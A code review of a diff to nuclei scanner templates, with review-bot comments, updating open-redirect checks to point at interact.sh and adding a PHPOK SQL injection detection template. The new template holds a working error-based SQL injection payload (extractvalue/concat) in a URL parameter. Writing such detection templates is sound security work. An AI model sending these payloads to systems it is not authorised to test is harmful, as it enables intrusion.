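Review bot: The word matcher `Location: https://interact.sh` is an exact, case-sensitive substring check, so a response that spells the header name `location:` or echoes the target with a different scheme or trailing slash would not match even though the redirect occurred, unless nuclei canonicalises header names before matching — I can't confirm that from here. Adding `case-insensitive: true` to the matcher, or switching to the `(?m)^(?:Location\s*?:\s*?)` regex form the neighbouring redirect templates use, would make the check consistent with them. The new `link` value decodes to `https://interact.sh` without the trailing newline the old payload carried, which is what makes the exact word match line up. The status matcher that follows is outside the hunk.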


@ -12,10 +12,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -13,10 +13,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/" - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -13,10 +13,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -0,0 +1,21 @@
id: phpok-sqli
info:
name: PHPOK - Sql Injection
author: ritikchaddha
severity: high
metadata:
fofa-query: app="phpok"
tags: phpok,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
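Review bot: The `info` block of the new template has no `description` and no `reference`, unlike the other SQLi template in this commit, so a reader has nothing to verify a `severity: high` finding against; a one-line `description:` naming the affected endpoint and parameter, a `reference:` to the advisory or issue, and `classification:` with `cwe-id: CWE-89` as the 74cms template carries would fill the gap. `matchers-condition: and` with a single word matcher is harmless but reads as if a status matcher was intended and not written; either add one or drop the condition. The whole new file is within this hunk.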
